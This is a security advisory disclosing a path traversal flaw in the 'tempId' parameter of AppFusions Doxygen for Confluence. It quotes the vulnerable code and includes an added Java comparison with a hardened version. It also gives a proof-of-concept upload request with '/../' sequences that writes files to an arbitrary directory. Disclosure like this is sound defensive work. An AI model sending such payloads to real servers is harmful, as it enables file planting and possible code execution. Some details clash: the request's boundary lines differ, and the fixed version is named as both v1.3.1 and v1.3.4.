
RCE Security Advisory
https://www.rcesecurity.com


1. ADVISORY INFORMATION
=======================
Product: AppFusions Doxygen for Atlassian Confluence
Vendor URL: www.appfusions.com
Type: Path Traversal [CWE-22]
Date found: 2016-06-23
Date published: -
CVSSv3 Score: 6.3 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L)
CVE: -


2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.


3. VERSIONS AFFECTED
====================
AppFusions Doxygen for Atlassian Confluence v1.3.0
Older versions may be affected too.


4. INTRODUCTION
===============
With Doxygen in Confluence, you can embed full-structure code documentation:
-Doxygen blueprint in Confluence to allow Doxygen archive imports
-Display documentation from annotated sources such as Java (i.e., JavaDoc),
 C++, Objective-C, C#, C, PHP, Python, IDL (Corba, Microsoft, and
 UNO/OpenOffice flavors), Fortran, VHDL, Tcl, D in Confluence.
-Navigation supports code structure (classes, hierarchies, files), element
 dependencies, inheritance and collaboration diagrams.
-Search documentation from within Confluence
-Restrict access to who can see/add what
-Doxygen in JIRA also available

(from the vendor's homepage)


5. VULNERABILITY DETAILS
========================
The application offers the functionality to import zipped Doxygen
documentation via a file upload to make it available within a
Confluence page. However, the application does not properly validate the
"tempId" parameter, which represents the directory where the contents of
the uploaded file will be extracted and stored. This leads to a path
traversal vulnerability when "/../" sequences are used as part of the
"tempId" parameter. Since the contents of the uploaded file are
extracted to the traversed directory, this vulnerability could also lead
to Remote Code Execution.

In DoxygenUploadServlet.java (lines 63-64) the "tempId" parameter is
read as part of a GET request to "/plugins/servlet/doxygen/upload" and
afterwards used in a "getTemporaryDirectory()" call:

    String tempId = request.getParameter("tempId");
    String destination =
        this.doxygenManager.getTemporaryDirectory(tempId).getAbsolutePath();

The "getTemporaryDirectory()" function is defined in
DefaultDoxyGenManager.java (lines 38-41) and constructs a file object
based on the "java.io.tmpdir" variable, the static string
"/doxygen-temp/", the user-supplied "tempId" and a file separator in
between all parts:

    public File getTemporaryDirectory(String tempId) {
        File file = new File(System.getProperty("java.io.tmpdir") +
            File.separator + "doxygen-temp" + File.separator + tempId);
        return file;
    }

In the subsequent code the uploaded file, as represented by the "file"
HTTP POST parameter to "/plugins/servlet/doxygen/upload", is extracted to
the directory which was built using the "file" object.
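The following Java class is an added example, not code from the advisory
or from AppFusions. It places the unchecked path construction described
above next to a hardened variant that rejects a "tempId" escaping the
"doxygen-temp" base directory. The class and method names, the fixed
"/tmp" stand-in for "java.io.tmpdir" and the identifier allowlist pattern
are assumptions made for the example; the plugin's real identifier format
is not stated in the advisory.

```java
import java.io.File;
import java.io.IOException;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.regex.Pattern;

/**
 * Added example (not the vendor's or the advisory's code): the unchecked
 * path construction from the advisory beside a hardened variant.
 */
public class DoxygenTempDirExample {

    // Assumption: a fixed stand-in for System.getProperty("java.io.tmpdir")
    // so the example behaves the same on every machine.
    private static final String TMP_DIR = "/tmp";
    private static final String BASE_DIR = TMP_DIR + File.separator + "doxygen-temp";

    // Allowlist for an identifier. The plugin's real tempId format is not
    // given in the advisory, so this pattern is an assumption, not the vendor's rule.
    private static final Pattern SAFE_ID = Pattern.compile("[A-Za-z0-9_-]{1,64}");

    /** Mirrors the vulnerable construction: tempId is appended without any check. */
    public static File vulnerableTemporaryDirectory(String tempId) {
        // java.io.File does not fold "..": the operating system resolves it
        // when the directory is later created, so "/../" walks out of BASE_DIR.
        return new File(BASE_DIR + File.separator + tempId);
    }

    /**
     * Hardened variant with two independent checks: the identifier must match
     * the allowlist, and the normalized target must be a strict child of the
     * base directory. Either check alone rejects the advisory's "/../" value;
     * keeping both means a later loosening of the allowlist cannot reopen the
     * traversal on its own.
     */
    public static File safeTemporaryDirectory(String tempId) throws IOException {
        if (tempId == null || !SAFE_ID.matcher(tempId).matches()) {
            throw new IOException("rejected tempId: not a plain identifier");
        }
        Path base = Paths.get(BASE_DIR).toAbsolutePath().normalize();
        // resolve() returns an absolute argument unchanged, and normalize()
        // folds "." and "..", so the containment test sees the real target.
        Path target = base.resolve(tempId).normalize();
        if (!target.startsWith(base) || target.equals(base)) {
            throw new IOException("rejected tempId: resolves outside " + base);
        }
        return target.toFile();
    }

    /** True if the hardened variant accepts the identifier. */
    public static boolean isAccepted(String tempId) {
        try {
            safeTemporaryDirectory(tempId);
            return true;
        } catch (IOException e) {
            return false;
        }
    }

    public static void main(String[] args) {
        String[] samples = {
            "a1b2c3",                               // ordinary identifier: accepted
            "/../../../../../../home/confluence",   // value from the advisory's PoC: rejected
            "..",                                   // would collapse onto the base itself: rejected
            "sub/dir"                               // a separator is not part of an id: rejected
        };
        for (String tempId : samples) {
            File vulnerable = vulnerableTemporaryDirectory(tempId);
            System.out.println("tempId=" + tempId);
            System.out.println("  vulnerable -> " + vulnerable.getPath());
            System.out.println("  hardened   -> " + (isAccepted(tempId) ? "accepted" : "rejected"));
        }
    }
}
```

The containment test is deliberately done on the normalized path rather
than on the raw string, so a check such as "does tempId contain ../" is
not what protects the directory; a denylist on the string would have to
anticipate every encoding and separator variant the servlet container
might decode, whereas comparing the resolved target against the base
does not.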

The following Proof-of-Concept triggers this vulnerability by uploading
a zipped file, which will be extracted to "/home/confluence" by the
application:

POST /plugins/servlet/doxygen/upload?tempId=/../../../../../../home/confluence HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
Content-Length: 966
Content-Type: multipart/form-data; boundary=---------------------------62841490314755966452122422550
Cookie: doc-sidebar=300px; doxygen_width=256; JSESSIONID=75A487B49F38A536358C728B1BE5A9E1
Connection: close

-----------------------------62841490314755966452122422550
Content-Disposition: form-data; name="file"; filename="Traversal.zip"
Content-Type: application/zip

[zipped data]
-----------------------------98001232218371736091795669059--


6. RISK
=======
To successfully exploit this vulnerability the attacker must be
authenticated and must have the rights within Atlassian Confluence to
upload Doxygen files (default).

The vulnerability allows remote attackers to upload arbitrary files to
any destination directory writable by the user of the web server, which
could lead to Remote Code Execution.


7. SOLUTION
===========
Update to AppFusions Doxygen for Atlassian Confluence v1.3.4


8. REPORT TIMELINE (DD/MM/YYYY)
===============================
23/06/2016: Discovery of the vulnerability
23/06/2016: Notified vendor via public security mail address
29/06/2016: No response, sent out another notification w/o details
29/06/2016: Response from vendor who asked for full details
30/06/2016: Sent over preliminary advisory with full details
03/07/2016: No response from vendor, sent out a status request
03/07/2016: Vendor temporarily removes product from website
11/07/2016: Vendor releases v1.3.1 which fixes the issue
20/11/2016: Advisory released